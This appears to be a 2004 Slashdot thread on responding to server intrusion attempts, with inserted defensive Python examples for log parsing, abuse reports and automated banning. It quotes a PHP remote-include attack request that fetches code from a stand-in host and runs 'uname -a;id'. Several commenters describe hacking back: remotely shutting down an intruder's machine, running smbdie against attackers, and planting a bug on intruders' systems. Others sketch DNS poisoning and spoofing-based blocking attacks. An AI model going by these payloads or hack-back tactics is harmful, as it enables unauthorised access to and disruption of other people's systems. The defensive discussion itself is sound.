Security

Dealing with Intruders? 656

drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISPs - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"
  • Re:Create a honeypot (Score:2, Interesting)

    by Anonymous Coward on Friday August 13, 2004 @03:41AM (#9956444)
    This probably would have to be the best option so far. Then you could also log how they cracked the machine (using another machine). This would let you secure your other machines as well.

    (I've been told to say, "you're a fascist" so I did)
  • Corporate Gnome (Score:2, Interesting)

    by Destructo-Bot ( 794990 ) on Friday August 13, 2004 @03:41AM (#9956445)
    If there are indeed blatant attempts to gain access to your network and server, then a simple letter or email to their ISP should do the trick and help show your boss that you were trying to be proactive. Keep in mind that those IPs could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major ISPs.

    Best chance for a response is to keep it polite and request a notification of what action (if any) they will take. Don't fill your letter or email full of legalese and vague threats and I'm sure most of the people in charge of a particular abuse department will take you seriously enough. Whether or not they have the clout to take action on your behalf is another matter entirely however.

    Another thing to do is to just keep yourself patched, firewalled, and a close eye on your network. If the attempts are rising, someone thinks your network/servers is/are an easy target. Prove them wrong and perhaps you won't need to write that letter after all.

    Good luck.

  • Re:Your firewall.... (Score:4, Interesting)

    by Anonymous Coward on Friday August 13, 2004 @03:55AM (#9956501)
    Yeah cause, there's no such thing as Dynamic IP addresses.

    Better advice would be to only allow login connections (eg sshd) from known IP addresses.

    Other measures depend on what services you are trying to secure, but make sure you've run through the http://www.cisecurity.com/ [cisecurity.com] lvl 1 benchmarks on an Internet connected machine (at the very least run the scoring tool).
  • by BrynM ( 217883 ) * on Friday August 13, 2004 @04:13AM (#9956562) Homepage Journal
    Please note that this is ineffectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN [arin.net] and who has registered domain names at a lot of different places [google.com]. Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

    Due to abuse, the following IP address(es) have been banned from accessing
    mydomain.com and its associated services. The abuse is detailed as
    follows:

    IP(s) Banned: 216.nnn.225.nn

    Owner:
    OrgName: SOME ISP
    Address: 2 Hacker Home Street
    City: Isabel
    StateProv: CA
    PostalCode: 01120
    Country: US
    Admin Address: noc@someisp.net

    Reason:
    Malformed URL - Attempted PHP Exploit
    "216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
    /themes/default/theme.php?THEME_DIR=http://www.evil-hacker.
    net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

    Severity: 5

    Remaining bans until entire address block banned: 3

    If you have any questions or need further explanation, please contact
    admin@mydomain.com.

    You
    Your Title
    Your Contact Info
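Putting the two halves of BrynM's advice together (match the offending request in the web log, then write a notice in the layout above) is straightforward to automate. The following is an added example, not BrynM's script or anything from the thread: it parses Apache common-format log lines, flags only requests whose query string carries a URL or a cmd= parameter (so a plain path like /calendar never matches), groups hits per client IP, and renders the notice. The log lines, domain names and WHOIS fields are constructed for the example (RFC 5737 documentation addresses, .example domains); a real report takes the owner fields from ARIN/APNIC, which this code deliberately does not query.

```python
import re
from collections import defaultdict

# Apache common/combined log format: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each pattern is matched against the request line only and is tied to the
# query string, so that an ordinary page whose path merely contains a word
# (the thread's "/calendar" false positive) does not trigger it.
ATTACK_PATTERNS = [
    # a query parameter whose value is a URL: remote file inclusion attempt
    ("Malformed URL - Attempted PHP Exploit (remote include)",
     re.compile(r'\?[^ ]*=(?:https?|ftp)://', re.I), 5),
    # a cmd= parameter: shell command smuggled through a web script
    ("Command injection attempt via query string",
     re.compile(r'[?&]cmd=', re.I), 5),
]

def parse_line(line):
    """Split one access-log line into fields; None if it is not a log line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(request):
    """Return (reason, severity) for the first matching pattern, else None."""
    for reason, pattern, severity in ATTACK_PATTERNS:
        if pattern.search(request):
            return reason, severity
    return None

def collect_abuse(lines):
    """Group matching log lines by client IP: ip -> [(reason, severity, raw line)]."""
    by_ip = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hit = classify(entry["request"])
        if hit is not None:
            reason, severity = hit
            by_ip[entry["ip"]].append((reason, severity, line.strip()))
    return dict(by_ip)

def render_report(ip, hits, domain, contact, owner, remaining_bans):
    """Render an abuse notice in the layout of the letter quoted above.

    `owner` is a dict of WHOIS fields looked up beforehand; no network access here."""
    severity = max(s for _, s, _ in hits)
    reasons = sorted({r for r, _, _ in hits})
    lines = [
        "Due to abuse, the following IP address(es) have been banned from accessing",
        f"{domain} and its associated services. The abuse is detailed as",
        "follows:", "",
        f"IP(s) Banned: {ip}", "",
        "Owner:",
    ]
    lines += [f"{k}: {v}" for k, v in owner.items()]
    lines += ["", "Reason:"] + reasons
    lines += ["", "Evidence:"] + [f'"{raw}"' for _, _, raw in hits]
    lines += ["", f"Severity: {severity}", "",
              f"Remaining bans until entire address block banned: {remaining_bans}", "",
              "If you have any questions or need further explanation, please contact",
              f"{contact}."]
    return "\n".join(lines)

# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Aug/2004:10:03:03 -0700] "GET /themes/default/theme.php'
    '?THEME_DIR=http://attacker.example/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352',
    '198.51.100.5 - - [11/Aug/2004:10:05:00 -0700] "GET /calendar/index.html HTTP/1.1" 200 1024',
    '203.0.113.7 - - [11/Aug/2004:10:06:12 -0700] "GET /index.php?page=http://attacker.example/x.txt HTTP/1.0" 404 290',
    'not a log line at all',
]

# Constructed WHOIS fields; a real report uses the registry's answer.
SAMPLE_OWNER = {"OrgName": "EXAMPLE ISP", "Admin Address": "abuse@example.net"}

def build_reports(lines=SAMPLE_LOG, min_hits=1):
    """One report per offending IP that has at least `min_hits` matches."""
    return {
        ip: render_report(ip, hits, "mydomain.example", "admin@mydomain.example",
                          SAMPLE_OWNER, remaining_bans=3)
        for ip, hits in collect_abuse(lines).items()
        if len(hits) >= min_hits
    }

if __name__ == "__main__":
    for report in build_reports().values():
        print(report, end="\n\n")
```

The `min_hits` threshold is the point BrynM makes about looking before sending: a single odd request from an address is not worth a letter, and the quoted evidence lines let the ISP's abuse desk verify the claim from their own logs rather than take an IP on trust.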
  • by pasko ( 758206 ) on Friday August 13, 2004 @04:15AM (#9956567)
    Last week I managed to login as root into a machine (from a Chinese domain, as usual) for which I had packets logged in my firewall's log. Then, I installed in that machine chkrootkit: lots of executables were wrong (rootkits). Then, someone logged in remotely and left in /root a "readme.txt" message warning me not to log in other's computers .... Finally I did three things:
    1.- Send an e-mail to the contact-addresses retrieved from APNIC
    2.- Copied my shutdown executable to that machine (the original was obviously tricked)
    3.- Remotely, executed @> shutdown -h now
    Just a suggestion.
  • Firewall? (Score:3, Interesting)

    by vandan ( 151516 ) on Friday August 13, 2004 @04:16AM (#9956574) Homepage
    Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

    My advice is to firewall them.

    Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advice because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

    So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your server, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.
  • Re:Create a honeypot (Score:5, Interesting)

    by welshwaterloo ( 740554 ) on Friday August 13, 2004 @04:16AM (#9956577)
    IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

    Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
    If your hacker is serious, he's gonna be really pissed about this.

    Secure your network & keep it secure - no need to stir 'em up.
  • Somewhat offtopic, but how do people deal with DOS attacks?
    I've had a person harassing the forums at a website that I host.
    I banned by IP and then he started using proxies,
    so I had to write a script to ban his IP each time he logged in,
    of course then he started creating new accounts;
    so I had to change the forum registration to one account per unique email address.
    And then he tried to DOS the site by visiting the site and locking down his F5 key.
    (He actually confessed this to me in IRC; he had 4 other people do this with him.)
    I sent Comcast (his ISP) the IRC logs & the network monitor logs.
    They sent me a generic response saying "blah blah blah.. this is an automated response".
    And that's it.
    So how do other /.ers deal with situations like this?
    It's a personal website, and I don't have the funds to hire a lawyer.
    I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.
  • Re:Corporate Gnome (Score:5, Interesting)

    by JWSmythe ( 446288 ) * <jwsmythe@nospam.jwsmythe.com> on Friday August 13, 2004 @04:39AM (#9956636) Homepage Journal

    No shit.. :)

    I've received some really nasty Emails over the years from winners who just installed some firewall on their home machine, and wonder why we're sending packets to him from our port 80 to some high port on his machine. They're all demanding that we stop or they'll sue, blah, blah, blah.

    I write a real friendly note back saying "sir, you were visiting a porn site at http://example.com. from which you detected the data coming back to you exactly as you requested. yada, yada, yada"

    Once in a while our provider will get a new person in their abuse department, and forward those over. I kindly remind them to go back to their supervisor and ask them exactly what this traffic would mean. Then I write them a friendly letter explaining the basics of the Internet. :)

    They are generally good about sending us only real problems, which are usually about sublet IP blocks. I either pass it on to their sales rep, or call them myself. Most customers I've dealt with are very friendly about it.

    We did have a federal agent show up in our office one day, about a hacking attempt from one of our networks (a sublet line). I called the sales rep, got the customer on the line, and they were already aware of it. It was an old unpatched machine, that they had taken offline a few days prior because they had already found it was broken into. They were still examining it, and offered to hold onto the drive for the investigator. I really like good customers.
  • Re:Create a honeypot (Score:3, Interesting)

    by ayjay29 ( 144994 ) on Friday August 13, 2004 @04:42AM (#9956641)
    I agree with the above. Also creating a honeypot will give these guys something to play with, something fun to do, which will mean they will be more likely to come back.

    If they can't get anywhere, they will move on somewhere else...


  • Damn, you must have a lot of time on your hands..

    We actively block viruses at the mail server, and our logs show over 20k came towards us yesterday. Want to parse my logs and report the infected machines? :)

    And yes, we don't send the automagic "We received a virus" notices. Those are just plain annoying considering most headers are faked.

  • by BlackHawk-666 ( 560896 ) on Friday August 13, 2004 @05:28AM (#9956784)
    If you don't want to ignore them, but rather take some action then you can combine tripwire (IIRC) with a shell action that firewalls their IP address. I used to do this for my home machine, but it's not really recommended for business machines. Here's what I did:

    Set up tripwire to detect incoming connections to 139, 1433 and other ports that people shouldn't be attempting to reach.

    Any attempts to open got an iptables rule added against their IP

    Every couple of weeks I'd clear it down and let it build up again

    There would be better ways to do this, but it was mainly for basic home security and I wasn't worried about blocking whole companies (because of NAT/Proxy) because of one dick in the place. YMMV.

  • Re:Snort + Guardian (Score:3, Interesting)

    by Umrick ( 151871 ) on Friday August 13, 2004 @06:36AM (#9956952) Homepage
    We ran this configuration for about 3 months. The problem is the sheer number of false positives by the default snort rules. If you can't spend the time trimming down the ruleset to bare minimum to cover your needs, you will be locking out end users.

    Classic for us was one user who had multiple domains with us got blocked every time she went to view one of her pages. Turns out the snort rule was so generic it was just looking for /calendar, so anything containing that would get trashed.

    In the general sense, most likely you won't get a whole lot of cooperation from the ISP (gone are the days of the minions at Erol's). Stay patched, use common sense, and ignore it.
  • by SgtChaireBourne ( 457691 ) on Friday August 13, 2004 @07:17AM (#9957087) Homepage
    The network administrator at one site I was at reduced the number of intrusions by more than 1/3 over a 2 month period and kept it down the whole time she kept the job.

    How? When she found out about attacks and attempted intrusions, she got on the phone with the netblock owner and gave them an earful and followed up until something happened, even if it was only a small improvement. If need be, she reported it to the police and was even able to convince them that crime was an area of their responsibility even if they did not currently have the expertise.

    The attacks dropped off rapidly after a few weeks. And since she'd kept notes about who she talked with, when and about what, there was very little runaround. When she started that, it took about 45 minutes per day, but by the end it was down to around 15 on average.

  • Re:Abuse@ (Score:5, Interesting)

    by AllUsernamesAreGone ( 688381 ) on Friday August 13, 2004 @07:33AM (#9957136)
    At least in the UK (where I have the most experience of computer laws), attempting to gain unauthorised access to a machine is a criminal offense under the Computer Misuse Act 1990, even conspiracy to do it is an offense. This is true whether you are a UK national or not - if you attack a machine in the UK and a report is passed to the police and the police investigation identifies you then the minute you set foot on British soil you could be arrested and prosecuted under the act (significant offenses may even result in extradition). I know several other countries have similar laws, I expect the US has as well.
  • by Ch_Omega ( 532549 ) on Friday August 13, 2004 @07:41AM (#9957171) Journal
    Seems like me posting that link, has resulted in it exceeding its allowed bandwidth. Here's the Google Cache [216.239.59.104].
  • Re:Two things (Score:2, Interesting)

    by 3rd_Floo ( 443611 ) on Friday August 13, 2004 @07:50AM (#9957208) Homepage
    Even better one would be for an intruder to take note of which DNS server you're connecting to, then BOOM, quick spoofed scan and you can't get DNS. While your DNS is out and you are trying to get your connection working they slip inline on you and 'pretend' to be your DNS, now they can poison you really easily... of course, muddling with the routing tables of an upstream switch and whatnot to pass themselves off as a DNS server, or hijacking the upstream DNS isn't always the easiest, but it would be a dirty way to slip into a large corp's systems if the security was set like such...
  • I agree! (Score:5, Interesting)

    by Mold ( 136317 ) on Friday August 13, 2004 @07:51AM (#9957211)
    Back when I was 13 or so, one of my friends had convinced me that trying something like this would be fun. I was a bit reluctant, but I had some knowledge of Unix and networking, and it did sound like fun.

    We never actually got into anything, but the next day I got an e-mail from one of the companies we had attempted to break into, politely asking me to stop. It scared the shit out of me and I never attempted anything like that again.

    And to be honest, the fact that I'd been caught and asked to stop (nicely!) impressed me far more than any of the hackers out there.
  • Upstream blocking (Score:2, Interesting)

    by Etherael ( 651533 ) on Friday August 13, 2004 @09:37AM (#9957934)
    It would be nice to adopt a routing protocol extension where you could ask an upstream router to block packets meeting a given criteria (*only to yourself, of course*). This would destroy DDOS attacks, which are currently the only really unstoppable attacks in existence, say you're getting flooded by ICMP from 250 hosts, and you just tell the upstream router to block ICMP traffic from the hosts in question (or for convenience sake, altogether, whatever really) It'd pretty much leave you scot free, in fact if it was extended further, DDOS zombies might get to the point that all their outbound traffic was blocked at their closest non controlled router point, which might clue in the users as to the status of their machines.

    Patent Pending!
  • Re:Very Easy (Score:3, Interesting)

    by IANAAC ( 692242 ) on Friday August 13, 2004 @09:58AM (#9958164)
    Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.

    So, you convince his ISP to issue a "You're no longer welcome here because you agreed to an AUP that forbids what you were trying to do" to him.

    Unfortunately, ISPs are bogged down with requests like these, so probably not much will/can be done realistically.

  • Re:This is more fun! (Score:4, Interesting)

    by Tassach ( 137772 ) on Friday August 13, 2004 @09:59AM (#9958177)
    Why waste bandwidth and CPU time sending a page back to what's most likely a worm-infected machine? The default 404 response is more than adequate. His RedirectMatch hack is pretty good, but you can use the same regexps in SetEnvIf rules:
    #regexp rules to set environment variables
    SetEnvIf Request_URI "(regexp1)" ATTACK
    SetEnvIf Request_URI "(regexp2)" ATTACK
    ...

    # Anything that matches a worm/virus attack pattern goes in a special log
    CustomLog logs/attack_log common env=ATTACK

    # Everything that's not an attack goes on the normal log
    CustomLog logs/access_log common env=!ATTACK
    This puts all the zombie/worm attacks into a separate log file. This also allows me to have logrotate truncate the attack_log and the access_log on different schedules.
  • Re:This is more fun! (Score:4, Interesting)

    by Tassach ( 137772 ) on Friday August 13, 2004 @10:04AM (#9958220)
    Oops... forgot the most important part:
    <Location />
    Order Allow,Deny
    Allow from all
    Deny from env=ATTACK
    ErrorDocument 403 "Worm Attack Suspected - Access Denied"
    </Location>
    You could replace the errordocument with a PHP or CGI to send back a page of shame instead of static text, but why bother?
  • Re:Two things (Score:3, Interesting)

    by Xner ( 96363 ) on Friday August 13, 2004 @10:10AM (#9958280) Homepage
    Who said anything about blocking a local port? If it's port SCANNING every port will be touched once or twice, and blocking local ports as they are touched is not going to have any meaningful effect. What the OP is talking about is adding a firewall route to ignore whatever comes from the address that is doing the scanning as soon as you detect it, ie. in the case of a "fast" scan, 3 or 4 ports into the thing.

    Your "there's a whole lotta IPs in the world" comment is seriously asinine as well. As I mentioned, it is trivial to spoof portscans, and while there may be a whole lotta IPs in the world, once you have accidentally firewalled off the ones belonging to your DNS or your mail server, you are going to have some serious networking issues. Running out of "kernel memory" (whatever that might be) is the last of his worries.
    Automated security response is a tricky business, and if you do not carefully consider all implications, you are going to be worse off than you were, not better.

    Don't take my word for it. Set up your PC this way and see how long it takes before someone uses it against you.

  • Re:I agree! (Score:4, Interesting)

    by LaCosaNostradamus ( 630659 ) <`moc.liam' `ta' `sumadartsoNasoCaL'> on Friday August 13, 2004 @10:20AM (#9958375) Journal
    This essentially sums up my shoplifting experience as a young teen. I was warned that I was seen taking an item, and that I should go back and "find" it and return it. I went to the back of the store, pulled the gum out of my pocket, and returned it to the shelf. No police, no threats ... but a firm reminder that I was as "caught" as they wanted me to be. The scare factor worked, and I never shoplifted again. Kids are kids, and the entire thing seemed wisely handled.
  • Re:Two things (Score:3, Interesting)

    by BlackHawk-666 ( 560896 ) on Friday August 13, 2004 @10:41AM (#9958630)
    You're right, it was portsentry. I also ran tripwire to check the integrity, but it was a while ago so my memories were fuzzy. You're wrong about the no more Slashdot and Google, the connections being firewalled were incoming, not outgoing.
  • Re:Very Easy (Score:3, Interesting)

    by networkBoy ( 774728 ) on Friday August 13, 2004 @11:04AM (#9958885) Journal
    Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.


    Exactly. What I've tended to do is when I see an obvious script kiddie hitting my server over and over (with the same damn script like it'll work the second/third/tenth time) is hack 'em back. I realize this only works if you catch them in the act, else you may hit someone else, but my general preference is to print the following to their printer:

    "Hey Cockbite: If you're going to try and hack someone, pick an admin who won't hack back"

    All in all it's harmless, but hopefully gives them the hint that they're being stupid. Also I've been known to drop in a bug that lets me know their current IP address so I can print the above message randomly for a month or so. Let them explain to mom and dad WTF is going on! Way better results than ruining their life with the cops. ;)

    -nB
  • Set up a sting. (Score:2, Interesting)

    by infosinger ( 769408 ) on Friday August 13, 2004 @11:21AM (#9959099)
    Why not create a honey pot that is weak enough for them to compromise it? Then you have evidence of a break in and the grounds to prosecute. Assuming you can identify the offender through the ISP you can make some serious threats with definite consequences.
  • Re:Very Easy (Score:3, Interesting)

    by cdrudge ( 68377 ) * on Friday August 13, 2004 @11:58AM (#9959537) Homepage
    If it's the same person multiple times, yes. If it's one person once, ignore it.

    I know that I occasionally forget who I'm connecting into and try to login as root out of habit but then realize where I'm at. Using your example, it would be like walking towards a car in the parking lot that looks like yours and trying the handle...but just as you do realizing that it's not your car.
  • Re:Easy (Score:3, Interesting)

    by eric76 ( 679787 ) on Friday August 13, 2004 @12:01PM (#9959583)
    In 1982 or so, I was working for a pipeline engineering company.

    One Saturday afternoon, I went to the office to do something on the computer (PDP 11/70). I was doing some disk work on the computer and didn't want anyone logged on accessing the disk while I did it.

    Before starting, I did a "systat" (system status command) and saw someone had dialed in from outside and was logged onto a games account.

    So I kicked him off, but he just dialed back in again. Every time I kicked him off, he was back in a minute.

    So I modified the login utility so that if you dialed in, it would tell you to call the number in the computer room and then drop the line.

    After a few minutes, he called! It sounded like a high school kid.

    I told him what I was doing and suggested he wait a while before calling back.

    After I finished what I was doing, I started wrote a little utility to take a snapshot of the system every six seconds and save the differences. I had a simple version working that evening and made some nice modifications to it the next couple of days.

    From then on, if he had ever logged back in, we could have detected just about anything he might do. But he never did log back onto the computer again.

    I never did know who the kid was, but my best guess was that it was the son of someone at the office.
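eric76's snapshot-every-six-seconds utility is a differential monitor: keep the current picture of who is logged in and what they are running, and write down only what changed. The following is an added example of that idea in Python, not eric76's PDP-11 code; the session listings are constructed (a systat-style map of terminal line to user and command) and the field names are assumptions. The recorder stores timestamped deltas and can rebuild the state at any sampled instant from the deltas alone, which is what makes the log useful after the fact.

```python
import json

def snapshot_diff(old, new):
    """Compare two snapshots (dicts keyed by terminal/session id) and return
    only what changed between them."""
    added = {k: new[k] for k in new if k not in old}
    removed = {k: old[k] for k in old if k not in new}
    changed = {k: {"before": old[k], "after": new[k]}
               for k in new if k in old and old[k] != new[k]}
    return {"added": added, "removed": removed, "changed": changed}

def apply_delta(state, delta):
    """Replay one delta onto a state dict, returning the new state."""
    state = dict(state)
    state.update(delta["added"])
    for key in delta["removed"]:
        state.pop(key, None)
    for key, change in delta["changed"].items():
        state[key] = change["after"]
    return state

class DeltaRecorder:
    """Keeps the latest snapshot plus a log of timestamped deltas, so the
    system state at any sampled instant can be rebuilt from the deltas alone."""

    def __init__(self):
        self.last = {}
        self.log = []   # list of (timestamp, delta), in time order

    def record(self, timestamp, snapshot):
        """Store the difference from the previous sample; unchanged samples cost nothing."""
        delta = snapshot_diff(self.last, snapshot)
        if any(delta.values()):
            self.log.append((timestamp, delta))
        self.last = dict(snapshot)
        return delta

    def state_at(self, timestamp):
        """Rebuild the snapshot as it was at `timestamp` by replaying deltas."""
        state = {}
        for ts, delta in self.log:
            if ts > timestamp:
                break
            state = apply_delta(state, delta)
        return state

    def dump(self):
        return json.dumps(self.log)

# Constructed samples six seconds apart, modelled on a systat-style listing:
# terminal line -> who is logged in, over what, running which command.
SAMPLES = [
    (0,  {"tty01": {"user": "ops", "line": "console", "cmd": "backup"}}),
    (6,  {"tty01": {"user": "ops", "line": "console", "cmd": "backup"},
          "tty07": {"user": "games", "line": "dialup", "cmd": "adventure"}}),
    (12, {"tty01": {"user": "ops", "line": "console", "cmd": "backup"},
          "tty07": {"user": "games", "line": "dialup", "cmd": "su"}}),
    (18, {"tty01": {"user": "ops", "line": "console", "cmd": "backup"},
          "tty07": {"user": "games", "line": "dialup", "cmd": "su"}}),
    (24, {"tty01": {"user": "ops", "line": "console", "cmd": "backup"}}),
]

def record_samples(samples=SAMPLES):
    rec = DeltaRecorder()
    for ts, snap in samples:
        rec.record(ts, snap)
    return rec

if __name__ == "__main__":
    rec = record_samples()
    for ts, delta in rec.log:
        print(ts, json.dumps(delta))
```

The interesting entries are the "changed" ones: a dial-up games account that suddenly runs su is exactly the kind of event a full dump every six seconds would bury, while a delta log shows it as a single line with the before and after.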
  • Re:Two things (Score:4, Interesting)

    by justMichael ( 606509 ) on Friday August 13, 2004 @12:15PM (#9959745) Homepage
    I'm sorry, but how is adding an incoming port block on a firewall going to prevent using google? Serving up a quake server, maybe, but outgoing surfing and the like sure isn't going to stop him.
    Blocking Google's IPs isn't going to keep you from searching, but it will keep Google off your site.

    Example: A competitor that just happens to rank higher than you automatically drops packets from any IP that tries an invalid login.

    You go through your logs and generate a list of all google's bots and then launch an "attack" against your competitor spoofing those IPs. You just stopped google from indexing their site. Move on to Yahoo and any other search engine you feel like.

    Granted somebody is going to be watching the logs and start to wonder why google hasn't visited in a while, but you get the point.
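BlackHawk-666's "add a firewall rule per offender, clear it down every couple of weeks" and the two objections above (Xner: a spoofed scan can get your own DNS or mail server blocked; justMichael: the same trick can lock out Google's crawlers) point at the same design: an automatic blocker needs a never-block list, a threshold so one mistyped root login does not count, and expiry. The following is an added example of that policy, not code from any of the posters: a small Python class that decides when a source has earned a block and returns the iptables command as a string rather than running it (the command form, the thresholds and the event list are all constructed for the example, with RFC 5737 documentation addresses). It should be fed events that required a completed TCP handshake, such as sshd login failures, since a bare SYN scan's source address can be forged.

```python
import ipaddress
from collections import defaultdict, deque

class AutoBanner:
    """Decide when a source address has earned a firewall block.

    never_ban:          networks that must not be blocked whatever the logs say
                        (resolvers, mail relays, search-engine crawlers, your own
                        netblocks), because scan packets can impersonate them.
    threshold / window: a block needs `threshold` events within `window` seconds.
    ban_seconds:        blocks expire, so the list is rebuilt instead of growing forever.
    """

    def __init__(self, threshold=3, window=600, ban_seconds=14 * 24 * 3600, never_ban=()):
        self.threshold = threshold
        self.window = window
        self.ban_seconds = ban_seconds
        self.never_ban = [ipaddress.ip_network(n, strict=False) for n in never_ban]
        self.attempts = defaultdict(deque)   # ip -> recent event timestamps
        self.bans = {}                       # ip -> expiry timestamp

    def protected(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.never_ban)

    def is_banned(self, ip, now):
        expiry = self.bans.get(ip)
        return expiry is not None and now < expiry

    def record(self, ip, now):
        """Register one suspicious event from `ip` at epoch time `now`.

        Returns the firewall command to run if this event crosses the threshold,
        otherwise None. Commands are returned as strings, never executed here."""
        if self.protected(ip) or self.is_banned(ip, now):
            return None
        recent = self.attempts[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:   # drop events outside the window
            recent.popleft()
        if len(recent) >= self.threshold:
            self.bans[ip] = now + self.ban_seconds
            recent.clear()
            return f"iptables -I INPUT -s {ip} -j DROP"
        return None

    def expire(self, now):
        """Lift bans that have run out; returns the commands that undo them."""
        commands = []
        for ip, expiry in list(self.bans.items()):
            if now >= expiry:
                del self.bans[ip]
                commands.append(f"iptables -D INPUT -s {ip} -j DROP")
        return commands

# Constructed events: (epoch seconds, source ip) taken from failed-login log lines.
SAMPLE_EVENTS = [
    (0,    "198.51.100.9"),    # scanner: three failures inside a minute
    (20,   "198.51.100.9"),
    (40,   "198.51.100.9"),
    (0,    "192.0.2.53"),      # "our resolver" as a forged source; must stay reachable
    (1,    "192.0.2.53"),
    (2,    "192.0.2.53"),
    (0,    "203.0.113.4"),     # one mistyped login, another an hour later: not a scan
    (3600, "203.0.113.4"),
]

def run_events(events=SAMPLE_EVENTS):
    """Feed the sample events through a banner and collect the commands it emits."""
    banner = AutoBanner(threshold=3, window=600,
                        never_ban=["192.0.2.0/24", "203.0.113.66/32"])
    commands = []
    for t, ip in events:
        cmd = banner.record(ip, t)
        if cmd:
            commands.append(cmd)
    return banner, commands

if __name__ == "__main__":
    banner, commands = run_events()
    print("\n".join(commands))
    print("still banned after a day:", banner.is_banned("198.51.100.9", 86400))
```

The never_ban list is the part that answers Xner and justMichael: populate it from your own resolver and MX addresses and the published crawler ranges before the first rule is ever added, and treat a hit against a protected address as a sign of spoofing to log, not a host to block.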
  • by Feanturi ( 99866 ) on Friday August 13, 2004 @01:33PM (#9960626)
    I think it would be neat to have a program that could be easily installed on a box, that would act as the firewall for the system. Traffic that a firewall would normally allow is passed normally. Traffic that would normally be dropped, such as a query to a port that is not open on the firewall, would not be dropped but instead be passed to the honeypot module of the program, and from there responded to in a way set by the user through a scripting interface.

    Example: You aren't running a telnet server on your box, so normally a connection attempt to port 23 would be dropped. Here you set your honeypot controls to engage a script that you have made (or that came pre-packaged with the software) showing them a fake login prompt that looks like whatever software you wish them to think you are using. Script appropriate responses to possible actions the hacker might try, based on what software they think you have. Let them appear to login with 'admin/admin' or whatever, and show them fake file directories and whatnot. Certain often-targeted files could be spoofed so the cracker can actually 'read' them and not be tipped off. Basically have the software fuck with them for awhile before revealing that "it's all been logged you luser, the Matrix has you, disconnect before things get worse"

    You could make a windows box look like anything else to mess with them, if your arsenal of scripts is deep enough. The program could come with a whole whack of pre-defined scripts, and users could create and upload new scripts to a website for others to install in their systems. And when someone installs and runs the program for the first time, they are *forced* to choose a computer name, OS, and other details, so that every out-of-the-box install of this thing doesn't look like every other one out there, making it less easy to detect.

    You'd have to make the main code smart enough to not bother if the intrusion appears to be a worm, otherwise such a machine would likely get pretty bogged down. I don't know how to do any of this, I would just like to have the software.

    Please? Somebody?
  • Re:Very Easy (Score:3, Interesting)

    by NanoGator ( 522640 ) on Friday August 13, 2004 @01:43PM (#9960766) Homepage Journal
    "Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?"

    No, he is not. I agree that he should be informed that it's not cool, but he doesn't need to have boot up his arse or to be called guilty of anything. Frankly, kids are curious. I've tried doorhandles before, it had nothing to do with me being up to no good. I was just curious if people really locked their cars.
  • Re:Very Easy (Score:5, Interesting)

    by Chazman ( 6089 ) on Friday August 13, 2004 @02:25PM (#9961316) Homepage
    Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?

    No. Trying a door handle does not imply mal-intent. It's the response when a door handle actually works that matters. I'll give you an anecdote. I was arriving at a semi-nice restaurant in a somewhat out of the way area of an otherwise nice town. Parking was scarce, so I had to park on a tiny unlit side-street. Walking toward the restaurant from my car, I saw another car on the street with its dome light on. It was obvious from a reasonable distance that there was no one in the car, but there was a pocketbook left on the front seat. Being a good Samaritan, I said "that won't do -- the pocketbook will get stolen, and the dome light will drain the battery". So I tried the door handle. To my surprise, it opened. I quickly turned the dome light off, closed the door again, and walked away. Turns out this was a sting. There had been a bunch of thefts from cars in the area recently, and this being a good town, the cops had enough time to set up a honeypot to try to catch the perp. They were quite chagrined to find someone go for the bait for an entirely altruistic reason -- to prevent a stranger from becoming the dual victim of a theft and a dead battery. Maybe I took a risk by trying that door handle and attempting to do some good. But how would you know if you deign to put a boot up my arse the instant I touch the doorhandle?

    Perhaps the analogy doesn't port over all that well to scans of TCP ports, but it wasn't I who began that analogy; I'm just answering it.
